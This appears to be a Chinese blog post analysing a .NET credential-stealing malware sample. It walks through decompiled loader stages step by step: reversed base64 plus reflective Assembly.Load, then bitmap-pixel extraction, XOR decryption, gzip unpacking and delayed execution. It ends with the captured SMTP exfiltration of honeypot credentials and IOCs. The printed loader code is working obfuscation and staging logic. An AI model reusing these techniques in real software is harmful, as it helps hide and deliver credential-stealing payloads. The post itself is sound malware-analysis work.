某cs读取资源文件样本执行分析

  1. 分析过程

继续学习样本分析
原YouTube视频分析:https://www.youtube.com/watch?v=deG_-5opR30
样本地址:https://app.any.run/tasks/6cdbb3ea-a272-47d5-b01e-0a41a1ae16f3/

分析过程

下载下来发现是.NET直接丢Dnspy反编译

跟随入口点

using System;
using System.Windows.Forms;


namespace WinFormsFirstOne
{
    // Token: 0x02000013 RID: 19
    internal static class Program
    {
        // Token: 0x06000096 RID: 150 RVA: 0x000068AA File Offset: 0x00004AAA
        [STAThread]
        private static void Main()
        {
            Application.EnableVisualStyles();
            Application.SetCompatibleTextRenderingDefault(false); //某些控件上定义的属性设置应用程序范围的默认值
            Application.Run(new Form1());
        }
    }
}

跟随第一个函数EnableVisualStyles

后续跟踪:

public static void EnableVisualStyles()
{
            string text = null;
            new FileIOPermission(PermissionState.None) //申请权限
            {
                AllFiles = FileIOPermissionAccess.PathDiscovery //访问路径本身中的信息。这有助于保护路径中的敏感信息,例如用户名,以及路径中显示的有关目录结构的信息。此值不授予对路径表示的文件或文件夹的访问权限。
            }.Assert(); //调用此方法的代码访问受权限需求保护的资源
            try
            {
                text = typeof(Application).Assembly.Location; //读取的资源文件内容
            }
            finally
            {
                CodeAccessPermission.RevertAssert();
            }
            if (text != null)
            {
                Application.EnableVisualStylesInternal(text, 101);
            }
}




private static void EnableVisualStylesInternal(string assemblyFileName, int nativeResourceID) //EnableVisualStylesInternal函数翻译启用视觉样式内部
{
            Application.useVisualStyles = UnsafeNativeMethods.ThemingScope.CreateActivationContext(assemblyFileName, nativeResourceID);
}


////////////////////////
public static bool CreateActivationContext(string dllPath, int nativeResourceManifestID) //native Resource Manifest ID(本机资源清单ID)
{
                Type typeFromHandle = typeof(UnsafeNativeMethods.ThemingScope);
                bool result;
                lock (typeFromHandle)
                {
                    if (!UnsafeNativeMethods.ThemingScope.contextCreationSucceeded && OSFeature.Feature.IsPresent(OSFeature.Themes))
                    {
                        UnsafeNativeMethods.ThemingScope.enableThemingActivationContext = default(UnsafeNativeMethods.ThemingScope.ACTCTX);
                        UnsafeNativeMethods.ThemingScope.enableThemingActivationContext.cbSize = Marshal.SizeOf(typeof(UnsafeNativeMethods.ThemingScope.ACTCTX));
                        UnsafeNativeMethods.ThemingScope.enableThemingActivationContext.lpSource = dllPath;
                        UnsafeNativeMethods.ThemingScope.enableThemingActivationContext.lpResourceName = (IntPtr)nativeResourceManifestID;
                        UnsafeNativeMethods.ThemingScope.enableThemingActivationContext.dwFlags = 8U;
                        UnsafeNativeMethods.ThemingScope.hActCtx = UnsafeNativeMethods.ThemingScope.CreateActCtx(ref UnsafeNativeMethods.ThemingScope.enableThemingActivationContext); // CreateActCtx函数创建一个激活上下文
                        UnsafeNativeMethods.ThemingScope.contextCreationSucceeded = (UnsafeNativeMethods.ThemingScope.hActCtx != new IntPtr(-1));
                    }
                    result = UnsafeNativeMethods.ThemingScope.contextCreationSucceeded;
                }
                return result;
}

看完完全不知道真正的东西,返回到入口点查看new From1。发现只是实例化各种窗口的,完全没有有用信息

在一筹莫展的时候,跟着视频走。发现是直接分析资源文件处理函数

跟随到资源文件,可以看到定义的SAS变量

跟随Rate函数(以后找不到函数被使用,可以直接Dnspy对着哪一行右键”分析”)

分析如下:

using System;


namespace WinFormsFirstOne
{
    // Token: 0x02000009 RID: 9
    internal class Castle
    {
        // Token: 0x04000032 RID: 50
        public static string Ir = "cnJCh";


        // Token: 0x04000033 RID: 51
        public static string Iq = "HvXUw";


        // Token: 0x04000034 RID: 52
        public static string Le = "Load";
    }
}




        InvokeMethod = 256,


    public static string Select(string s)
        {
            char[] array = s.ToCharArray();
            Array.Reverse(array); //反转数组
            return new string(array);
        }


        // Token: 0x0600006C RID: 108 RVA: 0x00004BD0 File Offset: 0x00002DD0
        public string Rate(object[] io)
        {
            byte[] array = Convert.FromBase64String(FarmDestination.Select(Resources.SAS.Replace("Quotes_on_Life", "A"))); //base64解码
            Assembly assembly = (Assembly)Type.GetType("System@@@@@^Reflection@@@@@^Assembly".Replace("@@@@@^", ".")).InvokeMember(Castle.Le, BindingFlags.InvokeMethod, null, null, new object[]
            {
                array
            }); //调用公开静态函数(加载解码的base64) Assembly assembly = (Assembly)Type.GetType("System.Reflection.Assembly").InvokeMember("Load",256,null,null,new object[]){array}
            MethodInfo o = (MethodInfo)LateBinding.LateGet(assembly.GetType("Dژ家ycحElj她s.的Fڵ是rn太Wظ"), null, "GetMethod", new object[]
            {
                "执ZciGڤjPز"
            }, null, null); //获取"Dژ家ycحElj她s.的Fڵ是rn太Wظ".执ZciGڤjP调用结果
            LateBinding.LateGet(o, null, FarmDestination.Select("ekovnI"), new object[]
            {
                null,
                io
            }, null, null);
            return "Biara";
        }
    }
}

将SAS变量进行base64解码
1.将Quotes_on_Life替换为A
2.反转base64
3.base64解码

保存到文件,继续拖到dnspy分析,跟踪调用的 执ZciGڤjPز函数。发现是调用了几个函数后远程加载

跟踪هmyڕDئفTH函数
1.获取入口函数程序集所在的文件
2.创建一个新的ResourceManager
3.返回了个Bitmap

跟踪بظxئ家g希顾太太Bحه函数
(貌似是解密的算法)

跟踪c商ەڤG首首rءsە函数
从gzip流读取数据返回

一般这种情况需要断点Assembly.Load才能获取解密后的结果。然后作者把这个dump出来的文件,直接丢de4dot.exe然后就得到了解密的结果

最后确定入口点在(smethod_4函数):

using System;
using System.Collections.Generic;
using System.Drawing;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Resources;
using System.Text;
using System.Threading;


namespace ns1
{
    // Token: 0x02000002 RID: 2
    public class GClass0
    {
        // Token: 0x06000001 RID: 1 RVA: 0x00002064 File Offset: 0x00000264
        public static byte[] smethod_0(byte[] byte_0)
        {
            byte[] result;
            using (MemoryStream memoryStream = new MemoryStream(byte_0))
            {
                byte[] array = new byte[4];
                memoryStream.Read(array, 0, 4);
                int num = BitConverter.ToInt32(array, 0);
                using (GZipStream gzipStream = new GZipStream(memoryStream, CompressionMode.Decompress))
                {
                    byte[] array2 = new byte[num];
                    gzipStream.Read(array2, 0, num);
                    result = array2;
                }
            }
            return result;
        }


        // Token: 0x06000002 RID: 2 RVA: 0x000020E4 File Offset: 0x000002E4
        public static byte[] smethod_1(byte[] byte_0, string string_1) //xor解密
        {
            byte[] bytes = Encoding.ASCII.GetBytes(string_1); //密钥
            int num = (int)(byte_0[byte_0.Length - 1] ^ 112);
            byte[] array = new byte[byte_0.Length + 1];
            int num2 = 0;
            for (int i = 0; i <= byte_0.Length - 1; i++)
            {
                array[i] = (byte)((int)byte_0[i] ^ num ^ (int)bytes[num2]);
                if (num2 == string_1.Length - 1)
                {
                    num2 = 0;
                }
                else
                {
                    num2++;
                }
            }
            Array.Resize<byte>(ref array, byte_0.Length - 1);
            return array;
        }


        // Token: 0x06000003 RID: 3 RVA: 0x00002164 File Offset: 0x00000364
        private static byte[] smethod_2(Bitmap bitmap_0)
        {
            List<byte> list = new List<byte>();
            checked
            {
                int num = bitmap_0.Width - 1;
                for (int i = 0; i <= num; i++)
                {
                    int num2 = bitmap_0.Height - 1;
                    for (int j = 0; j <= num2; j++)
                    {
                        Color pixel = bitmap_0.GetPixel(i, j);
                        if (pixel != Color.FromArgb(0, 0, 0, 0))
                        {
                            list.InsertRange(list.Count, new byte[]
                            {
                                pixel.R,
                                pixel.G,
                                pixel.B
                            });
                        }
                    }
                }
                return list.ToArray();
            }
        }


        // Token: 0x06000004 RID: 4 RVA: 0x00002208 File Offset: 0x00000408
        public static Bitmap smethod_3(string string_1, string string_2)
        {
            ResourceManager resourceManager = new ResourceManager(string_2 + ".Properties.Resources", Assembly.GetEntryAssembly());
            return (Bitmap)resourceManager.GetObject(string_1);
        }


        // Token: 0x06000005 RID: 5 RVA: 0x0000223C File Offset: 0x0000043C
        public static void smethod_4(string string_1, string string_2, string string_3)
        {
            Thread.Sleep(38000);
            byte[] rawAssembly = GClass0.smethod_0(GClass0.smethod_1(GClass0.smethod_2(GClass0.smethod_3(string_1, string_3)), string_2));
            Assembly.Load(rawAssembly).EntryPoint.Invoke(0, null);
            Environment.Exit(0);
        }


        // Token: 0x04000001 RID: 1
        private string string_0 = "You will face many defeats in life, but never let yourself be defeated.";
    }
}

由于加密太多,过于繁琐。无法看到源代码静态分析执行了什么。只能丢沙箱了看看执行了什么,或者在运行的时候dump .NET内存
(最后是释放了个exe在执行)
作者使用了MegaDumper工具在运行的时候dump下来的exe:https://github.com/CodeCracker-Tools/MegaDumper

最后丢dnspy得到原始的代码

using System;
using System.EnterpriseServices;
using System.Globalization;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Runtime.Remoting;
using System.Text;
using System.Threading;


// Token: 0x02000003 RID: 3
[ComVisible(false)]
public class RegSvcs
{
    // Token: 0x06000005 RID: 5
    [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern int SearchPath(string path, string fileName, string extension, int numBufferChars, StringBuilder buffer, int[] filePart);


    // Token: 0x06000007 RID: 7 RVA: 0x0000209C File Offset: 0x0000029C
    private static RegistrationHelper GetRegistrationHelper(bool bCreateAppDomain, out AppDomain domain)
    {
        RegistrationHelper result = null;
        domain = null;
        if (!bCreateAppDomain)
        {
            result = new RegistrationHelper();
        }
        else
        {
            string directoryName = Path.GetDirectoryName(RegSvcs.regConfig.AssemblyFile);
            domain = AppDomain.CreateDomain("RegSvcs", null, new AppDomainSetup
            {
                ApplicationBase = directoryName
            });
            if (domain != null)
            {
                ObjectHandle objectHandle = domain.CreateInstance(typeof(RegistrationHelper).Assembly.FullName, typeof(RegistrationHelper).FullName);
                if (objectHandle != null)
                {
                    result = (RegistrationHelper)objectHandle.Unwrap();
                }
            }
        }
        return result;
    }


    // Token: 0x06000008 RID: 8 RVA: 0x00002124 File Offset: 0x00000324
    private static string FindAssembly(string name)
    {
        StringBuilder stringBuilder = new StringBuilder(261);
        if (RegSvcs.SearchPath(null, name, null, stringBuilder.Capacity + 1, stringBuilder, null) == 0)
        {
            return null;
        }
        return stringBuilder.ToString();
    }


    // Token: 0x06000009 RID: 9 RVA: 0x00002158 File Offset: 0x00000358
    private static bool IsAssemblyInGAC(string name)
    {
        try
        {
            Assembly assembly = Assembly.Load(name);
        }
        catch
        {
            return false;
        }
        return true;
    }


    // Token: 0x0600000A RID: 10 RVA: 0x00002188 File Offset: 0x00000388
    [MTAThread]
    public static int Main(string[] args)
    {
        int result;
        try
        {
            result = RegSvcs.UnsafeMain(args);
        }
        catch
        {
            result = 1;
        }
        return result;
    }


    // Token: 0x0600000B RID: 11 RVA: 0x000021B4 File Offset: 0x000003B4
    public static int UnsafeMain(string[] args)
    {
        AppDomain appDomain = null;
        RegSvcs.DoConsoleInitialization();
        try
        {
            RegSvcs.ParseArguments(args); //根据命令行做出对应的函数处理
            if (RegSvcs.logoOutput)
            {
                RegSvcs.PrintLogo();
            }
            if (RegSvcs.regConfig.AssemblyFile != null)
            {
                string text = RegSvcs.FindAssembly(RegSvcs.regConfig.AssemblyFile);
                RegistrationHelper registrationHelper;
                if (text != null)
                {
                    RegSvcs.regConfig.AssemblyFile = text;
                    registrationHelper = RegSvcs.GetRegistrationHelper(true, out appDomain);
                }
                else
                {
                    if (!RegSvcs.IsAssemblyInGAC(RegSvcs.regConfig.AssemblyFile))
                    {
                        throw new RegistrationException(Resource.FormatString("RegSvcs_AssemblyNotFound", RegSvcs.regConfig.AssemblyFile));
                    }
                    registrationHelper = RegSvcs.GetRegistrationHelper(false, out appDomain);
                }
                if (RegSvcs.uninstallApplication)
                {
                    registrationHelper.UninstallAssemblyFromConfig(ref RegSvcs.regConfig);
                    if (RegSvcs.successOutput)
                    {
                        Console.WriteLine(Resource.FormatString("RegSvcs_UninstallSuccess", RegSvcs.regConfig.AssemblyFile));
                    }
                }
                else
                {
                    registrationHelper.InstallAssemblyFromConfig(ref RegSvcs.regConfig);
                    if (RegSvcs.successOutput)
                    {
                        if (RegSvcs.regConfig.Partition != null && RegSvcs.regConfig.Application != null)
                        {
                            Console.WriteLine(Resource.FormatString("RegSvcs_InstallSuccess2", new string[]
                            {
                                RegSvcs.regConfig.AssemblyFile,
                                RegSvcs.regConfig.Application,
                                RegSvcs.regConfig.Partition,
                                RegSvcs.regConfig.TypeLibrary
                            }));
                        }
                        else if (RegSvcs.regConfig.Application != null)
                        {
                            Console.WriteLine(Resource.FormatString("RegSvcs_InstallSuccess", RegSvcs.regConfig.AssemblyFile, RegSvcs.regConfig.Application, RegSvcs.regConfig.TypeLibrary));
                        }
                        else
                        {
                            Console.WriteLine(Resource.FormatString("RegSvcs_NoServicedComponents"));
                        }
                    }
                }
            }
        }
        catch (UsageException ex)
        {
            if (RegSvcs.logoOutput)
            {
                RegSvcs.PrintLogo();
            }
            Console.WriteLine(ex.Message);
            return ex.ReturnCode;
        }
        catch (RegistrationException ex2)
        {
            string msg;
            if (RegSvcs.uninstallApplication)
            {
                msg = Resource.FormatString("RegSvcs_UninstallError");
            }
            else
            {
                msg = Resource.FormatString("RegSvcs_InstallError");
            }
            RegSvcs.DumpExceptions(msg, ex2, false);
            if (ex2.InnerException != null)
            {
                if (ex2.InnerException is COMException)
                {
                    COMException ex3 = (COMException)ex2.InnerException;
                    if (ex3.ErrorCode != 0)
                    {
                        return ex3.ErrorCode;
                    }
                    return 1;
                }
            }
            else if (ex2.ErrorInfo != null)
            {
                foreach (RegistrationErrorInfo registrationErrorInfo in ex2.ErrorInfo)
                {
                    if (registrationErrorInfo.ErrorCode != 0)
                    {
                        return registrationErrorInfo.ErrorCode;
                    }
                }
            }
            return 1;
        }
        catch (COMException ex4)
        {
            RegSvcs.DumpExceptions(Resource.FormatString("RegSvcs_CatalogError"), ex4, false);
            if (ex4.ErrorCode != 0)
            {
                return ex4.ErrorCode;
            }
            return 1;
        }
        catch (Exception e)
        {
            RegSvcs.DumpExceptions(Resource.FormatString("RegSvcs_UnknownError"), e, true);
            return 1;
        }
        finally
        {
            if (appDomain != null)
            {
                AppDomain.Unload(appDomain);
            }
        }
        return 0;
    }


    // Token: 0x0600000C RID: 12 RVA: 0x000024FC File Offset: 0x000006FC
    private static void DoConsoleInitialization()
    {
        Thread.CurrentThread.CurrentUICulture = CultureInfo.CurrentUICulture.GetConsoleFallbackUICulture(); //当默认的图形用户界面区域不合适时,获取适合控制台应用程序的备用用户界面区域
        if (Console.OutputEncoding.CodePage != 65001 && Console.OutputEncoding.CodePage != Thread.CurrentThread.CurrentUICulture.TextInfo.OEMCodePage && Console.OutputEncoding.CodePage != Thread.CurrentThread.CurrentUICulture.TextInfo.ANSICodePage) //控制台编码不为UTF-8当前线程页面代码不为xxx则设置
        {
            Thread.CurrentThread.CurrentUICulture = new CultureInfo("en-US"); //设置区域为en-us
        }
    }


    // Token: 0x0600000D RID: 13 RVA: 0x00002584 File Offset: 0x00000784
    private static void DumpExceptions(string msg, Exception e, bool ename)
    {
        Console.WriteLine("\n" + msg);
        int num = 1;
        while (e != null)
        {
            if (ename || e.Message == null || e.Message.Length == 0)
            {
                Console.WriteLine(string.Concat(new object[]
                {
                    num,
                    ": ",
                    e.GetType().FullName,
                    " - ",
                    e.Message
                }));
            }
            else
            {
                Console.WriteLine(num + ": " + e.Message);
            }
            if (e is RegistrationException)
            {
                RegistrationErrorInfo[] errorInfo = ((RegistrationException)e).ErrorInfo;
                if (errorInfo != null)
                {
                    foreach (RegistrationErrorInfo registrationErrorInfo in errorInfo)
                    {
                        if (registrationErrorInfo.MinorRef.ToLower(CultureInfo.InvariantCulture) != "<invalid>")
                        {
                            Console.WriteLine(string.Concat(new string[]
                            {
                                "    ",
                                registrationErrorInfo.Name,
                                ".",
                                registrationErrorInfo.MinorRef,
                                ": ",
                                registrationErrorInfo.ErrorString
                            }));
                        }
                        else
                        {
                            Console.WriteLine("    " + registrationErrorInfo.Name + ": " + registrationErrorInfo.ErrorString);
                        }
                    }
                }
            }
            num++;
            e = e.InnerException;
        }
    }


    // Token: 0x0600000E RID: 14 RVA: 0x000026EE File Offset: 0x000008EE
    private static void PrintLogo()
    {
        Console.WriteLine(Resource.FormatString("RegSvcs_CopyrightMsg", "4.7.3062.0", CommonResStrings.CopyrightForCmdLine));
    }


    // Token: 0x0600000F RID: 15 RVA: 0x0000270C File Offset: 0x0000090C
    private static bool IsArgument(string arg, string check)
    {
        string b = arg.ToLower(CultureInfo.InvariantCulture);
        return "/" + check == b || "-" + check == b;
    }


    // Token: 0x06000010 RID: 16 RVA: 0x0000274C File Offset: 0x0000094C
    private static bool IsPrefixArgument(string arg, string check, ref string prefix)
    {
        string text = arg.ToLower(CultureInfo.InvariantCulture);
        prefix = null;
        if (arg.StartsWith("/" + check + ":", StringComparison.Ordinal) || arg.StartsWith("-" + check + ":", StringComparison.Ordinal))
        {
            if (arg.Length > check.Length + 2)
            {
                prefix = arg.Substring(check.Length + 2);
            }
            return true;
        }
        return RegSvcs.IsArgument(arg, check);
    }


    // Token: 0x06000011 RID: 17 RVA: 0x000027C4 File Offset: 0x000009C4
    private static void ParseArguments(string[] args) //根据命令行参数做出对应的函数处理
    {
        RegSvcs.regConfig.InstallationFlags = (InstallationFlags.FindOrCreateTargetApplication | InstallationFlags.ReconfigureExistingApplication | InstallationFlags.ReportWarningsToConsole);
        RegSvcs.logoOutput = true;
        RegSvcs.successOutput = true;
        RegSvcs.uninstallApplication = false;
        if (args.Length < 1)
        {
            throw new UsageException(0);
        }
        int i;
        for (i = 0; i < args.Length; i++)
        {
            string text = null;
            if (RegSvcs.IsArgument(args[i], "?") || RegSvcs.IsArgument(args[i], "help"))
            {
                throw new UsageException(0);
            }
            if (RegSvcs.IsArgument(args[i], "c"))
            {
                RegSvcs.regConfig.InstallationFlags |= InstallationFlags.CreateTargetApplication;
                RegSvcs.regConfig.InstallationFlags &= ~InstallationFlags.FindOrCreateTargetApplication;
            }
            else if (RegSvcs.IsArgument(args[i], "fc"))
            {
                RegSvcs.regConfig.InstallationFlags |= InstallationFlags.FindOrCreateTargetApplication;
            }
            else if (RegSvcs.IsArgument(args[i], "exapp"))
            {
                RegSvcs.regConfig.InstallationFlags &= ~(InstallationFlags.CreateTargetApplication | InstallationFlags.FindOrCreateTargetApplication);
            }
            else if (RegSvcs.IsArgument(args[i], "extlb"))
            {
                RegSvcs.regConfig.InstallationFlags |= InstallationFlags.ExpectExistingTypeLib;
            }
            else if (RegSvcs.IsPrefixArgument(args[i], "tlb", ref text))
            {
                RegSvcs.regConfig.TypeLibrary = text;
            }
            else if (RegSvcs.IsArgument(args[i], "reconfig"))
            {
                RegSvcs.regConfig.InstallationFlags |= InstallationFlags.ReconfigureExistingApplication;
            }
            else if (RegSvcs.IsArgument(args[i], "noreconfig"))
            {
                RegSvcs.regConfig.InstallationFlags &= ~InstallationFlags.ReconfigureExistingApplication;
            }
            else if (RegSvcs.IsArgument(args[i], "nologo"))
            {
                RegSvcs.logoOutput = false;
            }
            else if (RegSvcs.IsArgument(args[i], "quiet"))
            {
                RegSvcs.regConfig.InstallationFlags &= ~InstallationFlags.ReportWarningsToConsole;
                RegSvcs.logoOutput = false;
                RegSvcs.successOutput = false;
            }
            else if (RegSvcs.IsArgument(args[i], "u"))
            {
                RegSvcs.uninstallApplication = true;
            }
            else if (RegSvcs.IsArgument(args[i], "componly"))
            {
                RegSvcs.regConfig.InstallationFlags |= InstallationFlags.ConfigureComponentsOnly;
            }
            else if (RegSvcs.IsPrefixArgument(args[i], "appname", ref text))
            {
                RegSvcs.regConfig.Application = text;
            }
            else if (RegSvcs.IsPrefixArgument(args[i], "parname", ref text))
            {
                RegSvcs.regConfig.Partition = text;
            }
            else if (RegSvcs.IsPrefixArgument(args[i], "appdir", ref text))
            {
                RegSvcs.regConfig.ApplicationRootDirectory = text;
            }
            else
            {
                if (args[i].StartsWith("/", StringComparison.Ordinal) || args[i].StartsWith("-", StringComparison.Ordinal))
                {
                    throw new UsageException(1, Resource.FormatString("RegSvcs_InvalidOption", args[i]));
                }
                break;
            }
        }
        if (i > args.Length)
        {
            throw new UsageException(1);
        }
        int num = args.Length - i;
        if (num == 0)
        {
            throw new UsageException(1, Resource.FormatString("RegSvcs_NotEnoughArgs"));
        }
        if (num == 1)
        {
            RegSvcs.regConfig.AssemblyFile = args[i];
            return;
        }
        if (num == 2)
        {
            RegSvcs.regConfig.AssemblyFile = args[i];
            RegSvcs.regConfig.Application = args[i + 1];
            RegSvcs.regConfig.TypeLibrary = null;
            return;
        }
        if (num == 3)
        {
            RegSvcs.regConfig.AssemblyFile = args[i];
            RegSvcs.regConfig.Application = args[i + 1];
            RegSvcs.regConfig.TypeLibrary = args[i + 2];
            return;
        }
        throw new UsageException(1, Resource.FormatString("RegSvcs_ToManyArgs"));
    }


    // Token: 0x04000002 RID: 2
    private const int MAX_PATH = 260;


    // Token: 0x04000003 RID: 3
    private static RegistrationConfig regConfig = new RegistrationConfig();


    // Token: 0x04000004 RID: 4
    private static bool logoOutput;


    // Token: 0x04000005 RID: 5
    private static bool successOutput;


    // Token: 0x04000006 RID: 6
    private static bool uninstallApplication;
}

看了一下连接信息:
先发送了一个Auth的请求头进行验证

解码:info@stankovic.hr

验证成功后会收集本机信息进行上传(发送到邮箱)

MIME-Version: 1.0
From: info@stankovic.hr
To: info@stankovic.hr
Date: 28 Jul 2020 20:46:04 +0100
Subject: PW_admin/USER-PC
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: quoted-printable


Time: 07/28/2020 20:45:57
User Name: admin
Computer Name: U=
SER-PC
OSFullName: Microsoft Windows 7 Professional
CPU: I=
ntel(R) Core(TM) i5-6400 CPU @ 2.70GHz
RAM: 3583.61 MB
<hr>=
URL:192.168.1.1
0D=0AUsername:honey@pot.com
0D=0APassword=
:honeypass356
0D=0AApplication:Outlook
0D=0A<hr>=0D=0AURL=
:https://m.facebook.com/
0D=0AUsername:honey@pot.com
0D=0A=
Password:honeypass356
0D=0AApplication:Chrome
0D=0A<hr>=0D=0A=
URL:https://m.facebook.com
0D=0AUsername:honey@pot.com
0D=0A=
Password:honeypass356
0D=0AApplication:Firefox
0D=0A<hr>=0D=0A

还有一些功能需要详细分析,感觉需要HOOK才能更好的分析….

MD5:1A25E75693B99AD09E55AEA29C6F2775
IOC:
89.201.175.36


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:某cs读取资源文件样本执行分析

本文作者:九世

发布时间:2021-04-14, 08:27:03

最后更新:2021-04-14, 08:44:35

原始链接:http://422926799.github.io/posts/a98e0b02.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录